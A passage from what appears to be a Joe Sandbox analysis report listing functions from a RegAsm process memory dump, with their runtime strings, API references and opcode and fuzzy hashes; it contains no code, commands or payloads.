                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02FB02E7
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
                                                    • Instruction ID: 7016dd89afe52f47fddd7a91e95590a8fcbc0a8f3c3a84d47920151a399664af
                                                    • Opcode Fuzzy Hash: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
                                                    • Instruction Fuzzy Hash: 5BE1DE31A087419FD725CF28D888B6AB7E1FF85394F140A5DF6A68B6E0DB35D844CB42
                                                    Function 02F7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 02FB7BAC
                                                    • RTL: Resource at %p, xrefs: 02FB7B8E
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02FB7B7F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
                                                    • Instruction ID: 2d48d9929a379c629eafbc509a3323eb6f92c464f537189e0225d18b86ac0bf1
                                                    • Opcode Fuzzy Hash: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
                                                    • Instruction Fuzzy Hash: 5641D3327047029FD720DE25CC40BAAF7E6EF86794F100A1EEA56DB680DB31E5058F91
                                                    Function 02F7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FB728C
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 02FB72C1
                                                    • RTL: Resource at %p, xrefs: 02FB72A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02FB7294
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
                                                    • Instruction ID: 252fab53c474429646705f6983251cc080fa57bb87518b44690848ab4f2dc14c
                                                    • Opcode Fuzzy Hash: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
                                                    • Instruction Fuzzy Hash: D3410732B00246ABD711EE25CD41BA6F7A5FF95794F140619FB55E7280DB31E841CBD0
                                                    Function 02F87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 982cf5030e74b2b8efe188a56dcb8a26dcaeb859998b72082ba7e68fcacfe992
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 2F91C679E0021A9BDF24FE6AC8807BEF7A5AF447E4F74451AEA55EB2C0D7309940CB50
                                                    Function 02F49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
                                                    • Instruction ID: 3ae24f5ebde0846f8bc958911dbc3b211a9da7cf4b722fd2b06149679be6998e
                                                    • Opcode Fuzzy Hash: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
                                                    • Instruction Fuzzy Hash: EB811EB1E012699BDB25DF54CC54BEEB7B8AF48754F0041EAEA19B7280D7705E84CFA0
                                                    Function 02FCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 02FCCFBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID: @$@4Qw@4Qw
                                                    • API String ID: 4062629308-2383119779
                                                    • Opcode ID: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
                                                    • Instruction ID: 379969c52047e3f8f57865bda9e57990503dc6d6e3020aa4f37cec3b4fe71b35
                                                    • Opcode Fuzzy Hash: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
                                                    • Instruction Fuzzy Hash: 4241BF71D00229DFCB21EF99C980A6EBBB9EF45B94F10406EEB14DB254E734D801CB64